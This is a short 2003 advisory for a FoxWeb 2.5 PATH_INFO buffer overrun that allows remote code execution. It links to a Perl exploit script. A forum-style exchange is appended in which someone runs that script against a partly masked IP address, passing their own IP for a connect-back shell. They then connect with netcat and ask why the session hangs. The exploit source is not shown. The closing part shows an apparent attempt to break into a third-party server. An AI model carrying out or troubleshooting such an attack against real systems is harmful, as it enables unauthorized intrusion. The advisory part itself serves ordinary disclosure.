published Sep 05, 2003
updated Sep 05, 2003
vulnerable FoxWeb FoxWeb 2.5

FoxWeb is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of user-supplied PATH_INFO data to the Foxweb CGI and ISAPI extension. Successful exploitation would permit a remote attacker to execute arbitrary code in the context of the software.



The following exploit was provided:
http://www.securityfocus.com/data/vulnerab...zooka_penaka.pl


The vendor has reportedly released a patch to address this issue. This has not been confirmed by Symantec. Users should contact the vendor to determine the availability of fixes.

Vendor Info:

FoxWeb 2 requires Windows XP/2003/2000/NT/Me/98. FoxWeb will not run under UNIX, Linux or the Macintosh operating system. If you have data created or maintained on these operating systems you can still use a PC-based server, running FoxWeb

what port is it???

Webserver port 80

D:\>bazooka_penaka.pl ***.160.160.3 80 [my IP] [80]
[x] Connect to ***.160.160.3 on port 80 ...
[x] Sending exploit code ...
[x] Exploit sent .. good luck ...

then im connecting with netcat
and it's stuck
on

C:\Program Files\SuperScan>nc -vvv ***.***.***.***
[***.***.***.***] 80 (http) open